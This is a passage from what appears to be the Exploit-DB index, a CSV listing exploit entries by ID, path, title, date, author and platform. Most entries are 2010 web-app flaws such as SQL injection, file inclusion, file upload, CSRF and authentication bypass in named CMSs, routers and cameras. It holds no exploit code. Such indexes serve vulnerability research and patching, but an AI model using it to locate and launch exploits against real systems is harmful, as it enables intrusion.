SQL Injections",2010-10-09,KnocKout,php,webapps, -15224,exploits/php/webapps/15224.txt,"Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps, -15225,exploits/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps, -15268,exploits/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps, -39571,exploits/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80 -15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,php,webapps, -15227,exploits/php/webapps/15227.txt,"PHP-Fusion Mod Mg User Fotoalbum 1.0.1 - SQL Injection",2010-10-10,"Easy Laster",php,webapps, -15592,exploits/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX & Cr3W-DZ",php,webapps, -15593,exploits/php/webapps/15593.html,"cPanel 11.x - Cross-Site Request Forgery (Edit E-mail)",2010-11-21,"Mon7rF .",php,webapps, -15594,exploits/php/webapps/15594.txt,"AuraCMS 1.62 - 'pfd.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps, -15595,exploits/php/webapps/15595.txt,"jSchool Advanced - Blind SQL Injection",2010-11-22,"Don Tukulesto",php,webapps, -15596,exploits/jsp/webapps/15596.txt,"JCMS 2010 - File Download",2010-11-22,Beach,jsp,webapps, -15597,exploits/asp/webapps/15597.txt,"Acidcat CMS 3.3 - 'FCKeditor' Arbitrary File Upload",2010-11-22,Net.Edit0r,asp,webapps, -15602,exploits/php/webapps/15602.txt,"PHPmotion 1.62 - 'FCKeditor' Arbitrary File Upload",2010-11-23,trycyber,php,webapps, -15605,exploits/php/webapps/15605.txt,"Getsimple CMS 2.01 < 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps, -15230,exploits/asp/webapps/15230.txt,"Site2Nite Auto e-Manager - SQL Injection",2010-10-10,KnocKout,asp,webapps, -15232,exploits/php/webapps/15232.txt,"OrangeHRM 2.6.0.1 - Local File Inclusion",2010-10-11,ZonTa,php,webapps, -15233,exploits/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection",2010-10-11,"John Leitch",php,webapps, -15234,exploits/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure",2010-10-11,"John Leitch",php,webapps, -15606,exploits/php/webapps/15606.txt,"phpvidz 0.9.5 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps, -15607,exploits/php/webapps/15607.txt,"WSN Links - SQL Injection",2010-11-24,"Mark Stanislav",php,webapps, -15237,exploits/php/webapps/15237.rb,"AdaptCMS 2.0.1 Beta - Remote File Inclusion (Metasploit)",2010-10-12,v3n0m,php,webapps, -15239,exploits/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery",2010-10-12,Yoyahack,php,webapps, -15240,exploits/php/webapps/15240.txt,"Collabtive 0.65 - Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps, -15247,exploits/php/webapps/15247.txt,"Exponent CMS 0.97 - Multiple Vulnerabilities",2010-10-13,LiquidWorm,php,webapps, -15249,exploits/php/webapps/15249.txt,"Data/File - upload and Management Arbitrary File Upload",2010-10-14,saudi0hacker,php,webapps, -15251,exploits/php/webapps/15251.txt,"Xlrstats 2.0.1 - SQL Injection",2010-10-14,Sky4,php,webapps, -15608,exploits/php/webapps/15608.txt,"Free Simple Software - SQL Injection",2010-11-24,"Mark Stanislav",php,webapps, -15254,exploits/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,php,webapps, -15270,exploits/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps, -15610,exploits/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-11-25,ALTBTA,php,webapps, -15280,exploits/php/webapps/15280.html,"Travel Portal Script - Cross-Site Request Forgery (Admin Password Change)",2010-10-19,KnocKout,php,webapps, -15276,exploits/php/webapps/15276.txt,"411cc - Multiple SQL Injections",2010-10-18,KnocKout,php,webapps, -15277,exploits/php/webapps/15277.txt,"GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps, -15278,exploits/php/webapps/15278.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps, -15281,exploits/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps, -15290,exploits/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps, -15300,exploits/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection",2010-10-21,"Salvatore Fresta",php,webapps, -15295,exploits/php/webapps/15295.html,"sNews CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps, -15308,exploits/php/webapps/15308.txt,"Pulse Pro 1.4.3 - Persistent Cross-Site Scripting",2010-10-24,"Th3 RDX",php,webapps, -15309,exploits/php/webapps/15309.txt,"DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection",2010-10-24,ZonTa,php,webapps, -15310,exploits/php/webapps/15310.py,"Jamb - Cross-Site Request Forgery (Add a Post)",2010-10-25,Stoke,php,webapps, -15313,exploits/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps, -15320,exploits/php/webapps/15320.py,"BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps, -15321,exploits/php/webapps/15321.txt,"DBHcms 1.1.4 - 'dbhcms_user/SearchString' SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps, -15322,exploits/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass",2010-10-27,"High-Tech Bridge SA",php,webapps, -15323,exploits/php/webapps/15323.txt,"DZCP (deV!L_z Clanportal) 1.5.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps, -15324,exploits/php/webapps/15324.txt,"Novaboard 1.1.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps, -15325,exploits/php/webapps/15325.txt,"MyBB 1.6 - Full Path Disclosure",2010-10-27,"High-Tech Bridge SA",php,webapps, -15326,exploits/php/webapps/15326.txt,"BloofoxCMS 0.3.5 - Information Disclosure",2010-10-27,"High-Tech Bridge SA",php,webapps, -15327,exploits/php/webapps/15327.txt,"Energine CMS - SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps, -15328,exploits/php/webapps/15328.txt,"BloofoxCMS Registration Plugin - SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps, -15329,exploits/php/webapps/15329.txt,"Zomplog 3.9 - Cross-Site Request Forgery",2010-10-27,"High-Tech Bridge SA",php,webapps, -15330,exploits/php/webapps/15330.txt,"NinkoBB 1.3RC5 - Cross-Site Scripting",2010-10-27,"High-Tech Bridge SA",php,webapps, -15331,exploits/php/webapps/15331.txt,"Zomplog 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps, -15332,exploits/php/webapps/15332.txt,"BlogBird Platform - Multiple Cross-Site Scripting Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps, -15335,exploits/php/webapps/15335.txt,"Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps, -15338,exploits/php/webapps/15338.txt,"ACC IMoveis 4.0 - SQL Injection",2010-10-27,EraGoN,php,webapps, -15340,exploits/php/webapps/15340.txt,"mycart 2.0 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps, -15343,exploits/php/webapps/15343.php,"RoSPORA 1.5.0 - Remote PHP Code Injection",2010-10-28,EgiX,php,webapps, -15345,exploits/php/webapps/15345.txt,"TFTgallery 0.13.1 - Local File Inclusion",2010-10-28,Havok,php,webapps, -15348,exploits/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps, -15350,exploits/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - 'overview.php' SQL Injection",2010-10-29,"Easy Laster",php,webapps, -15351,exploits/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - 'game.php' SQL Injection",2010-10-29,"Easy Laster",php,webapps, -15353,exploits/php/webapps/15353.txt,"Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps, -15354,exploits/php/webapps/15354.txt,"Zoopeer 0.1/0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,php,webapps, -15355,exploits/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps, -15360,exploits/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps, -15361,exploits/php/webapps/15361.pl,"MetInfo 3.0 - PHP Code Injection",2010-10-31,Beach,php,webapps, -15366,exploits/php/webapps/15366.txt,"Joomla! Component Pulse Infotech Flip Wall - SQL Injection",2010-10-31,FL0RiX,php,webapps, -15367,exploits/php/webapps/15367.txt,"Joomla! Component Sponsor Wall 1.1 - SQL Injection",2010-10-31,FL0RiX,php,webapps, -15369,exploits/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps, -15370,exploits/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,php,webapps, -15381,exploits/php/webapps/15381.txt,"Collabtive 0.65 - SQL Injection",2010-11-01,"Anatolia Security",php,webapps, -15382,exploits/asp/webapps/15382.txt,"douran portal 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps, -15385,exploits/php/webapps/15385.txt,"Kandidat CMS 1.4.2 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps, -15386,exploits/php/webapps/15386.txt,"MemHT Portal 4.0.1 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps, -15387,exploits/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps, -15389,exploits/php/webapps/15389.php,"MetInfo 3.0 - 'FCKeditor' Arbitrary File Upload",2010-11-02,[sh3n],php,webapps, -15391,exploits/php/webapps/15391.txt,"Azaronline Design - SQL Injection",2010-11-02,XroGuE,php,webapps, -15395,exploits/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings - SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps, -15396,exploits/asp/webapps/15396.txt,"Comrie Software Pay Roll Time Sheet & Punch Card - Authentication Bypass",2010-11-02,"L0rd CrusAd3r",asp,webapps, -15397,exploits/asp/webapps/15397.txt,"Online Work Order System (OWOS) Professional Edition - Authentication Bypass",2010-11-02,"L0rd CrusAd3r",asp,webapps, -15398,exploits/asp/webapps/15398.txt,"Digger Solutions NewsLetter Open Source - SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps, -15399,exploits/asp/webapps/15399.txt,"Site2Nite Business eListings - SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps, -15400,exploits/php/webapps/15400.txt,"Dolphin 7.0.3 - Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,php,webapps, -15917,exploits/php/webapps/15917.txt,"Ignition 1.3 - 'comment.php' Local File Inclusion",2011-01-06,n0n0x,php,webapps, -40388,exploits/php/webapps/40388.html,"AnoBBS 1.0.1 - Remote File Inclusion",2016-09-16,bd0rk,php,webapps,80 -15404,exploits/php/webapps/15404.txt,"eLouai's Force Download Script - Arbitrary Local File Download",2010-11-03,v1R00Z,php,webapps, -15405,exploits/php/webapps/15405.txt,"digiSHOP 2.0.2 - SQL Injection",2010-11-03,Silic0n,php,webapps, -15409,exploits/php/webapps/15409.txt,"Zen Cart 1.3.9h - Local File Inclusion",2010-11-03,"Salvatore Fresta",php,webapps, -15412,exploits/php/webapps/15412.txt,"eoCMS 0.9.04 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps, -15413,exploits/php/webapps/15413.txt,"SweetRice 0.6.7 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps, -15414,exploits/php/webapps/15414.txt,"JAF CMS 4.0 rc2 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps, -15415,exploits/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection",2010-11-04,"High-Tech Bridge SA",php,webapps, -15416,exploits/php/webapps/15416.txt,"JBI CMS - SQL Injection",2010-11-04,Cru3l.b0y,php,webapps, -15430,exploits/php/webapps/15430.txt,"Joomla! Component ccInvoices - SQL Injection",2010-11-05,FL0RiX,php,webapps, -15439,exploits/php/webapps/15439.txt,"Joomla! Component com_connect - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps, -15440,exploits/php/webapps/15440.txt,"Joomla! Component com_dcnews - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps, -15441,exploits/php/webapps/15441.txt,"MassMirror Uploader - Remote File Inclusion",2010-11-06,ViciOuS,php,webapps, -15447,exploits/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion",2010-11-06,ViRuS_HiMa,php,webapps, -15448,exploits/asp/webapps/15448.txt,"ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps, -15451,exploits/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Information Disclosure",2010-11-07,"Vis Intelligendi",php,webapps, -15452,exploits/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosures",2010-11-07,SYSTEM_OVERIDE,php,webapps, -15453,exploits/php/webapps/15453.txt,"Joomla! Component Cookex Agency CKForms - Local File Inclusion",2010-11-08,ALTBTA,php,webapps, -15454,exploits/php/webapps/15454.txt,"Joomla! Component com_clan - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,php,webapps, -15455,exploits/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3/4 - 'FCKeditor' Arbitrary File Upload",2010-11-08,Net.Edit0r,php,webapps, -15456,exploits/php/webapps/15456.txt,"Joomla! Component com_clanlist - SQL Injection",2010-11-08,CoBRa_21,php,webapps, -15496,exploits/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps, -15459,exploits/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps, -15460,exploits/php/webapps/15460.txt,"Joomla! Component ProDesk 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps, -15466,exploits/php/webapps/15466.txt,"Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps, -15465,exploits/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",php,webapps, -15468,exploits/php/webapps/15468.txt,"Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps, -15469,exploits/php/webapps/15469.txt,"Joomla! Component com_markt - SQL Injection",2010-11-09,CoBRa_21,php,webapps, -15470,exploits/php/webapps/15470.txt,"Joomla! Component com_img - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps, -15484,exploits/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - 'FileManager upload.php' Arbitrary File Upload",2010-11-10,grabz,php,webapps, -15472,exploits/php/webapps/15472.txt,"osCommerce 2.2 - Cross-Site Request Forgery",2010-11-09,daandeveloper33,php,webapps, -15473,exploits/multiple/webapps/15473.html,"IBM OmniFind - Cross-Site Request Forgery",2010-11-09,"Fatih Kilic",multiple,webapps, -15490,exploits/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 - Cross-Site Scripting",2010-11-11,"Philipp Niedziela",php,webapps, -15486,exploits/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injections",2010-11-10,"Salvatore Fresta",php,webapps, -15488,exploits/php/webapps/15488.txt,"Landesk - OS command Injection",2010-11-11,"Aureliano Calvo",php,webapps, -15492,exploits/php/webapps/15492.php,"E-Xoopport 3.1 - 'display.php?katid' SQL Injection",2010-11-11,"Vis Intelligendi",php,webapps, -15497,exploits/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection",2010-11-12,Daikin,asp,webapps, -15500,exploits/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,php,webapps, -15501,exploits/php/webapps/15501.txt,"Joomla! Component JSupport 1.5.6 - Cross-Site Scripting",2010-11-12,Valentin,php,webapps, -15502,exploits/php/webapps/15502.txt,"Joomla! Component JSupport 1.5.6 - SQL Injection",2010-11-12,Valentin,php,webapps, -15506,exploits/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps, -15507,exploits/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera - Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps, -15509,exploits/php/webapps/15509.txt,"Build a Niche Store 3.0 - 'BANS' Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps, -15510,exploits/php/webapps/15510.txt,"AWCM 2.1 Final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps, -15512,exploits/php/webapps/15512.py,"DBSite - SQL Injection",2010-11-13,God_Of_Pain,php,webapps, -15513,exploits/php/webapps/15513.txt,"WordPress Plugin Event Registration 5.32 - SQL Injection",2010-11-13,k3m4n9i,php,webapps, -15515,exploits/php/webapps/15515.txt,"Invision Power Board 3 - 'search_app' SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps, -15516,exploits/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps, -15517,exploits/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps, -15518,exploits/php/webapps/15518.txt,"Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps, -15519,exploits/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps, -15524,exploits/php/webapps/15524.txt,"Pre ADS Portal - Authentication Bypass",2010-11-13,Cru3l.b0y,php,webapps, -15531,exploits/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps, -15526,exploits/php/webapps/15526.txt,"Pre Online Tests Generator Pro - SQL Injection",2010-11-13,Cru3l.b0y,php,webapps, -15550,exploits/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent Cross-Site Scripting via Profile Customization",2010-11-16,MaXe,php,webapps, -15551,exploits/asp/webapps/15551.txt,"BPAffiliate Affiliate Tracking - Authentication Bypass",2010-11-16,v3n0m,asp,webapps, -15552,exploits/asp/webapps/15552.txt,"BPDirectory Business Directory - Authentication Bypass",2010-11-16,v3n0m,asp,webapps, -15543,exploits/php/webapps/15543.txt,"Chameleon Social Networking Software - Persistent Cross-Site Scripting",2010-11-15,Dr-mosta,php,webapps, -15544,exploits/asp/webapps/15544.txt,"Web Wiz NewsPad Express Edition 1.03 - Database File Disclosure",2010-11-15,keracker,asp,webapps, -15545,exploits/php/webapps/15545.txt,"Nuked-klaN Module Boutique - Blind SQL Injection",2010-11-15,[AR51]Kevinos,php,webapps, -15549,exploits/php/webapps/15549.txt,"Joomla! Component com_alfurqan15x - SQL Injection",2010-11-15,kaMtiEz,php,webapps, -15553,exploits/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting - Authentication Bypass",2010-11-16,v3n0m,asp,webapps, -15554,exploits/asp/webapps/15554.txt,"BPRealestate Real Estate - Authentication Bypass",2010-11-16,v3n0m,asp,webapps, -15555,exploits/php/webapps/15555.txt,"Joomla! Component com_maianmedia - SQL Injection",2010-11-16,v3n0m,php,webapps, -15557,exploits/php/webapps/15557.txt,"openEngine 2.0 100226 - Local File Inclusion / Cross-Site Scripting",2010-11-16,"SecPod Research",php,webapps, -15559,exploits/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps, -15560,exploits/php/webapps/15560.txt,"ClanSphere 2010.0 Final - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps, -15561,exploits/php/webapps/15561.txt,"CompactCMS 1.4.1 - SQL Injection",2010-11-16,"High-Tech Bridge SA",php,webapps, -15563,exploits/asp/webapps/15563.txt,"Sitefinity CMS - 'ASP.NET' Arbitrary File Upload",2010-11-17,Net.Edit0r,asp,webapps, -15564,exploits/php/webapps/15564.txt,"Front Accounting 2.3RC2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps, -15565,exploits/php/webapps/15565.txt,"Front Accounting 2.3RC2 - Multiple SQL Injections",2010-11-17,"Juan Manuel Garcia",php,webapps, -15567,exploits/php/webapps/15567.txt,"WebRCSdiff 0.9 - 'viewver.php' Remote File Inclusion",2010-11-18,FL0RiX,php,webapps, -15568,exploits/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps, -15570,exploits/php/webapps/15570.php,"Joomla! Component com_mtree 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps, -15571,exploits/php/webapps/15571.txt,"Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX & Cr3W-DZ",php,webapps, -15572,exploits/php/webapps/15572.txt,"ViArt Shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps, -15573,exploits/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,php,webapps, -15574,exploits/php/webapps/15574.txt,"Arabian YouTube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps, -15577,exploits/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)",2010-11-19,Or4nG.M4N,php,webapps, -15578,exploits/php/webapps/15578.txt,"DVD Rental Software - SQL Injection",2010-11-19,JaMbA,php,webapps, -15585,exploits/php/webapps/15585.txt,"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps, -16087,exploits/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,php,webapps, -15588,exploits/php/webapps/15588.txt,"S_CMS 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps, -15590,exploits/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - Cross-Site Scripting Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps, -15614,exploits/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps, -15611,exploits/multiple/webapps/15611.txt,"JDownloader Webinterface - Source Code Disclosure",2010-11-25,Sil3nt_Dre4m,multiple,webapps, -15612,exploits/php/webapps/15612.txt,"SiteEngine 7.1 - SQL Injection",2010-11-25,Beach,php,webapps, -15615,exploits/php/webapps/15615.html,"Frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps, -15621,exploits/php/webapps/15621.txt,"Jurpopage 0.2.0 - SQL Injection",2010-11-27,Sudden_death,php,webapps, -15623,exploits/php/webapps/15623.pl,"MemHT Portal 4.0.1 - 'User Agent' Persistent Cross-Site Scripting",2010-11-27,ZonTa,php,webapps, -15625,exploits/cgi/webapps/15625.txt,"Skeletonz CMS - Persistent Cross-Site Scripting",2010-11-28,Jbyte,cgi,webapps, -15627,exploits/asp/webapps/15627.html,"Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection",2010-11-28,underground-stockholm.com,asp,webapps, -15629,exploits/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website - 'search.asp' / showAlllistings.asp' SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps, -15633,exploits/php/webapps/15633.html,"Diferior 8.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-29,"High-Tech Bridge SA",php,webapps, -15636,exploits/php/webapps/15636.txt,"Orbis CMS 1.0.2 - Arbitrary File Upload",2010-11-30,"Mark Stanislav",php,webapps, -15637,exploits/php/webapps/15637.txt,"Link Protect 1.2 - Persistent Cross-Site Scripting",2010-11-30,"Shichemt Alen",php,webapps, -15638,exploits/php/webapps/15638.txt,"Duhok Forum 1.1 - Arbitrary File Upload",2010-11-30,BrOx-Dz,php,webapps, -15639,exploits/php/webapps/15639.txt,"Pandora FMS 3.1 - Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps, -15640,exploits/php/webapps/15640.txt,"Pandora Fms 3.1 - OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps, -15641,exploits/php/webapps/15641.txt,"Pandora Fms 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps, -15642,exploits/php/webapps/15642.txt,"Pandora Fms 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps, -15643,exploits/php/webapps/15643.txt,"Pandora Fms 3.1 - Directory Traversal / Local File Inclusion",2010-11-30,"Juan Galiana Lara",php,webapps, -15644,exploits/php/webapps/15644.txt,"Eclime 1.1.2b - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps, -15645,exploits/php/webapps/15645.txt,"enano CMS 1.1.7pl1 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps, -15646,exploits/php/webapps/15646.txt,"DynPG 4.2.0 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps, -15647,exploits/php/webapps/15647.txt,"Elxis CMS 2009.2 - SQL Injection",2010-11-30,"High-Tech Bridge SA",php,webapps, -15650,exploits/php/webapps/15650.txt,"Alibaba Clone B2B 3.4 - SQL Injection",2010-12-01,"Dr.0rYX & Cr3W-DZ",php,webapps, -15651,exploits/php/webapps/15651.txt,"OsCSS 1.2 - Arbitrary File Upload",2010-12-01,"Shichemt Alen",php,webapps, -15653,exploits/asp/webapps/15653.txt,"BugTracker.NET 3.4.4 - Multiple Vulnerabilities",2010-12-01,"Core Security",asp,webapps, -15654,exploits/php/webapps/15654.txt,"Digitalus 1.10.0 Alpha2 - Arbitrary File Upload",2010-12-01,eidelweiss,php,webapps, -15656,exploits/php/webapps/15656.txt,"LittlePhpGallery 1.0.2 - Local File Inclusion",2010-12-01,"kire bozorge khavarmian",php,webapps, -15659,exploits/php/webapps/15659.txt,"Contenido CMS 4.8.12 - Cross-Site Scripting",2010-12-02,"High-Tech Bridge SA",php,webapps, -15660,exploits/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps, -15661,exploits/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections",2010-12-02,underground-stockholm.com,asp,webapps, -15665,exploits/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps, -15666,exploits/hardware/webapps/15666.txt,"D-Link Routers - Authentication Bypass (1)",2010-12-03,"Craig Heffner",hardware,webapps, -15673,exploits/asp/webapps/15673.txt,"Dejcom Market CMS - 'showbrand.aspx' SQL Injection",2010-12-04,Mormoroth,asp,webapps, -15675,exploits/hardware/webapps/15675.txt,"Linksys Routers - Cross-Site Request Forgery",2010-12-04,"Martin Barbella",hardware,webapps, -15677,exploits/asp/webapps/15677.txt,"T-Dreams Cars Ads Package 2.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps, -15678,exploits/asp/webapps/15678.txt,"T-Dreams Job Seekers Package 3.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps, -15679,exploits/asp/webapps/15679.txt,"ASPSiteWare Recipe ORGanizer - SQL Injection",2010-12-04,R4dc0re,asp,webapps, -15680,exploits/asp/webapps/15680.txt,"ASPSiteWare Project Reporter - SQL Injection",2010-12-04,R4dc0re,asp,webapps, -15681,exploits/asp/webapps/15681.txt,"ASPSiteWare JobPost 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps, -15682,exploits/asp/webapps/15682.txt,"ASPSiteWare ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps, -15683,exploits/asp/webapps/15683.txt,"ASPSiteWare Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps, -15684,exploits/php/webapps/15684.txt,"WordPress 3.0.1 - 'do_trackbacks()' SQL Injection",2010-12-05,M4g,php,webapps, -15685,exploits/php/webapps/15685.html,"PHPKF Forum 1.80 - 'profil_degistir.php' Cross-Site Request Forgery",2010-12-05,FreWaL,php,webapps, -15686,exploits/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 - SQL Injection",2010-12-05,R4dc0re,asp,webapps, 